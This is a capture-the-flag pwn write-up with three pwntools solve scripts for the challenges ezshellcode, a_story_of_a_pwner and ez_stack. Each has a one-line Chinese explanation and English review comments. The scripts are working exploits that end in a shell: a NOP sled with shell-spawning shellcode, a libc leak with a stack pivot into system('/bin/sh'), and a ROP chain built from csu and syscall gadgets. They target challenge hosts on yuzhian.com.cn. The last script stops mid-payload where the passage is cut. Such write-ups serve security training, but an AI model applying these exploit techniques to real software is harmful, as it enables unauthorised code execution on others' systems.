ezshellcode
填充nop抵消随机滑行到shellcode
#!usr/bin/env python
#coding=utf-8
# NOTE(review): the shebang above lacks a leading '/' ("#!/usr/bin/env python");
# harmless when started as "python <file>", broken when the file is executed directly.
#
# "ezshellcode" solve script: 104 NOP bytes (0x90) followed by shellcraft.sh() are sent
# as the program's input. The NOP run acts as a sled, so control flow only has to land
# somewhere inside the 104-byte run rather than exactly at the shellcode, which absorbs
# the variation in the stack address the write-up title refers to.
# Defender's view: this only works if the input buffer is executable and the return
# address is reachable without tripping a canary; the binary's mitigation state is not
# shown in this excerpt — confirm with checksec before drawing conclusions.
from pwn import *
from ctypes import CDLL
context(arch = 'amd64',os = 'linux',log_level = 'debug')
elf = ELF('./pwn')
DEBUG = 1  # as published: 1 = local process (+ optional gdb), 0 = remote target
if DEBUG:
    gdbOpen = 1
    clibc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')  # loaded but never used in this script
    p = process('./pwn')
else:
    gdbOpen = 0
    ip = 'node.yuzhian.com.cn'
    port = 38867
    p = remote(ip, port)
    clibc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')  # loaded but never used in this script
def debug(info="b main"):
    """Attach gdb to `p` with the given gdb command string, only when gdbOpen == 1 (local run)."""
    if gdbOpen == 1:
        gdb.attach(p, info)
    #gdb.attach(p, "b *$rebase(0x)")
debug("b *0x00000000004012F1")  # absolute breakpoint; presumably a non-PIE binary (addresses are fixed) — confirm
shellcode = p8(0x90) * 104 + asm(shellcraft.sh())  # NOP sled + shell-spawning shellcode
p.sendafter("in 5 min!\n", shellcode)  # str delimiter; pwntools encodes it, a bytes literal would be cleaner
p.interactive()
a_story_of_a_pwner
栈迁移然后刚好够弹一个参数执行system
#!usr/bin/env python
#coding=utf-8
# NOTE(review): the shebang above lacks a leading '/' ("#!/usr/bin/env python").
#
# "a_story_of_a_pwner" solve script. Menu option 4 prints a libc pointer from which the
# libc base is derived; options 1-3 each store one 8-byte value (binsh, pop_rdi, system)
# through a "comment" prompt; a final overflow pivots the stack (the write-up's 栈迁移)
# onto those stored values so that system("/bin/sh") runs.
# Defender's view: the enabling weaknesses visible here are the raw pointer disclosure in
# option 4, fixed code/data addresses (0x401573, 0x40139E, 0x405098 — presumably a non-PIE
# build), and the overflow behind the final prompt. Mitigation state is not shown in this
# excerpt — confirm with checksec.
from pwn import *
from ctypes import CDLL
context(arch = 'amd64',os = 'linux',log_level = 'debug')
elf = ELF('./pwn')
DEBUG = 0  # as published: 0 = remote target, 1 = local process (+ optional gdb)
if DEBUG:
    gdbOpen = 1
    clibc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')  # loaded but never used in this script
    libc = ELF("./libc.so.6")  # challenge-supplied libc; all symbol offsets below come from it
    p = process('./pwn')
else:
    gdbOpen = 0
    ip = 'node2.yuzhian.com.cn'
    port = 33627
    libc = ELF("./libc.so.6")  # challenge-supplied libc; all symbol offsets below come from it
    p = remote(ip, port)
    clibc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')  # loaded but never used in this script
def debug(info="b main"):
    """Attach gdb to `p` with the given gdb command string, only when gdbOpen == 1 (local run)."""
    if gdbOpen == 1:
        gdb.attach(p, info)
    #gdb.attach(p, "b *$rebase(0x)")
def choose(choice):
    """Send a menu choice after the "> " prompt; `choice` is stringified, so int or str both work."""
    p.sendlineafter(b"> \n", str(choice).encode('ascii'))
pop_rdi = 0x0000000000401573    # gadget address in the binary (absolute)
leave_ret = 0x000000000040139E  # leave ; ret gadget used for the stack pivot
debug("b *0x000000000040139F")
choose(4)  # option 4 prints a libc address in hex
p.recvuntil(b'0x')
# 12 hex digits = a 48-bit user-space pointer. 0x84420 is that pointer's offset inside
# ./libc.so.6; which symbol it belongs to is not shown here — recompute if the libc changes.
leak = int(p.recv(12), 16) - 0x84420
log.info("libc_base==>0x%x" %leak)
sys = leak + libc.sym['system']  # NOTE(review): shadows the `sys` module name pulled in by `from pwn import *`; harmless here
binsh = leak + next(libc.search(b'/bin/sh'))
# Three 8-byte stores into fixed slots; the prompts deliberately differ in spelling.
choose(1)
p.sendafter(b'comment?\n', p64(binsh))
choose(2)
p.sendafter(b'corment?\n', p64(pop_rdi))
choose(3)
p.sendafter(b'corMenT?\n', p64(sys))
choose(4)
# Presumably 0xa bytes of filler reach the saved rbp (overwritten with 0x405098) and the
# next 8 bytes the return address (overwritten with leave;ret), so the following `leave`
# moves rsp into the 0x405098 area. How the comment slots are laid out relative to
# 0x405098 is not visible in this excerpt — verify in the binary.
payload = b'a'*0xa + p64(0x0000000000405098) + p64(leave_ret)
p.sendafter(b'heart...\n', payload)
p.interactive()
ez_stack
程序内直接就能找到syscall的gadget,使用其即可,注意的地方就是csu调用的时候是个指针,所以要把这个地址写入bss上才能正常使用
#!usr/bin/env python
#coding=utf-8
# NOTE(review): the shebang above lacks a leading '/' ("#!/usr/bin/env python").
#
# "ez_stack" solve script (the payload construction is cut off in this excerpt). The
# binary contains its own `syscall` gadget (0x40114e) and the script sets up a
# csu-style chain (csu1/csu2) with pop rdi / pop rsi gadgets. Per the write-up text, the
# csu gadget calls through a pointer, so the target address is first written to .bss.
# Defender's view: fixed gadget addresses imply a non-PIE build (presumably — confirm with
# checksec); the local run pins glibc 2.23, presumably to match the remote target.
from pwn import *
from ctypes import CDLL
context(arch = 'amd64',os = 'linux',log_level = 'debug')
elf = ELF('./ez_stack')
DEBUG = 0  # as published: 0 = remote target, 1 = local process (+ optional gdb)
if DEBUG:
    gdbOpen = 1
    # Local run under a specific glibc/loader pair (author-specific absolute paths); the
    # binary is started via the matching ld.so with the libc injected through LD_PRELOAD.
    libc = ELF("/home/shoucheng/tools/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so")
    ld = ELF("/home/shoucheng/tools/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/ld-2.23.so")
    p = process(argv=[ld.path,elf.path], env={"LD_PRELOAD" : libc.path})
    clibc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')  # loaded but never used in the visible script
    #p = process('./ez_stack')
else:
    gdbOpen = 0
    ip = 'node2.yuzhian.com.cn'
    port = 35211
    p = remote(ip, port)
    clibc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')  # loaded but never used in the visible script
def debug(info="b main"):
    """Attach gdb to `p` with the given gdb command string, only when gdbOpen == 1 (local run)."""
    if gdbOpen == 1:
        gdb.attach(p, info)
    #gdb.attach(p, "b *$rebase(0x)")
# Gadget addresses are absolute (no base added), consistent with a non-PIE binary.
pop_rdi = 0x0000000000401283  # presumably pop rdi ; ret — only pop_rsi is annotated by the author; confirm in the disassembly
pop_rsi = 0x0000000000401281 # pop rsi ; pop r15 ; ret
syscall = 0x000000000040114e  # syscall gadget found inside the binary itself (see write-up text)
csu1 = 0x000000000040127A  # presumably the two halves of the __libc_csu_init gadget pair — TODO confirm
csu2 = 0x0000000000401260
debug("b *0x00000000004011F6")
payload = b'a'*0x18 &#